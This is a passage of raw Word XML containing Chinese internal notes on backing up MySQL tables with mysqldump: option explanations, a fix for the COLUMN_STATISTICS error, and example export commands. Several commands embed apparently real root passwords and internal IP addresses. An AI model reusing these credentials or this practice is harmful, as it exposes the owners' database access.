    <w:p w14:paraId="6AECD0DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先根据鹏哥要求，在要备份的指定表中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A158907" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473683D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc159779552"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w14:paraId="116BE490" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732C108C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/CN_TangZheng/article/details/103884575</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83B973" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分参数的参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E74E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://blog.csdn.net/u010649766/article/details/78694424</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C869834" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5289F322" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中部分参数说明如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413D17" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:t>：只导数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED157C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--where</w:t>
      </w:r>
      <w:r>
        <w:t>：条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102023AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--triggers=false</w:t>
      </w:r>
      <w:r>
        <w:t>：不导触发器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04EC1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>--replace</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:t>取代</w:t>
      </w:r>
      <w:r>
        <w:t>INSERT INTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E275E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D17A81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>、全量备份：可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t>直接备份整个库或者是备份其中某一个库或者一个库中的某个表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C557611" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159F1D6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>、增量备份：增量备份是针对于数据库的</w:t>
      </w:r>
      <w:r>
        <w:t>bin-log</w:t>
      </w:r>
      <w:r>
        <w:t>日志进行备份的，需要开始数据库的</w:t>
      </w:r>
      <w:r>
        <w:t>bin-log</w:t>
      </w:r>
      <w:r>
        <w:t>日志。增量备份是在全量的基础上进行操作的。增量备份主要是靠</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>记录的</w:t>
      </w:r>
      <w:r>
        <w:t>bin-log</w:t>
      </w:r>
      <w:r>
        <w:t>日志。（可以把二进制日志保存成每天的一个文件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438C1BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606CE252" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#1.</w:t>
      </w:r>
      <w:r>
        <w:t>登录选项：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C335741" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>-u user</w:t>
      </w:r>
      <w:r>
        <w:t>：指定用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A72EEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -h host</w:t>
      </w:r>
      <w:r>
        <w:t>：指定主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C043E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    -p</w:t>
      </w:r>
      <w:r>
        <w:t>：表示要使用密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF95D18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B751E7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#2.</w:t>
      </w:r>
      <w:r>
        <w:t>备份选项：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F60CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --all-databases</w:t>
      </w:r>
      <w:r>
        <w:t>：备份所有数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D165B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --databases db1 db2</w:t>
      </w:r>
      <w:r>
        <w:t>：备份指定的数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51384E76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --single-transaction</w:t>
      </w:r>
      <w:r>
        <w:t>：对事务引擎执行热备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826E00D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --flush-logs</w:t>
      </w:r>
      <w:r>
        <w:t>：更新二进制日志文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E551A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --master-data=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C37C05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        1</w:t>
      </w:r>
      <w:r>
        <w:t>：每备份一个库就生成一个新的二进制文件</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>默认</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379A0C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        2</w:t>
      </w:r>
      <w:r>
        <w:t>：只生成一个新的二进制文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1A181B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    --quick</w:t>
      </w:r>
      <w:r>
        <w:t>：在备份大表时指定该选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101BC2E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14105AB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行全量备份，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527475DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果要进行增量备份的话，需要开启数据表重的插入或者修改字段，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录新建或者修改的时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>筛选（该过程看“记录数据插入的时间”一节），或者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DAB49E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594FEB9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果遇到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Unknown table 'COLUMN_STATISTICS' in information_schema (1109)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的报错，则需要手动关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COLUMN_STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的关于统计功能：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--column-statistics=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0EB42F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会出现一些奇怪的报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51235A39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54490CCE" w14:textId="6EF13AC9" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mysqldump 的 where 条件子句适用于这种情况：导出某张表的部分数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37692EAD" w14:textId="3C4B04ED" w:rsidR="00B23D1E" w:rsidRPr="00B23D1E" w:rsidRDefault="00B23D1E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B23D1E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>千万别忘了在日期的数字左右加单引号</w:t>
      </w:r>
      <w:r w:rsidR="00EF3472">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF3472">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r w:rsidR="00EF3472">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，否则就是全量了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117D1B59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">--column-statistics=0 -h 192.168.11.1 -P 3306 -uroot -pwenhailin -t --databases sca --tables cve --where=" published &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B23D1E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2023-01-09 15:56:22</w:t>
      </w:r>
      <w:r w:rsidRPr="00B23D1E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> or updated &gt;'2023-01-09 15:56:22'"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ome/syj/wenhailin/2023_01/2023_01_09_cve.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078ED703" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDB51FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--column-statistics=0 -h 192.168.3.184 -P 3306 -uroot -pwenhailin -t --databases $1 --tables $2  --where=" published &gt; $3 or updated &gt;$3" &gt; $4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4AD07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CCEAAC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份某个表，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert into</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A67D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump --column-statistics=0 -h 192.168.3.199 -P 23306 -uroot -p1qaz@WSX -t --databases sca --tables blingsec_vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> --where="published &gt; '2022-01-16'" &gt; /home/syj/wenhailin/Test/blingsec_vulnerability_Test.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE6AE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068760C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择性导出数据库结构、数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297A13C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>什么参数都不加，是同时导出表结构和数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E113B75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是只导出数据不导出表结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622EE57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是只导出结构不导出数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151E5C98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D2F6A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604D50CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>导出整个数据库结构和数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11213359" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump --column-statistics=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-h localhost -uroot -p123456 database &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BB8844" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5267759D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
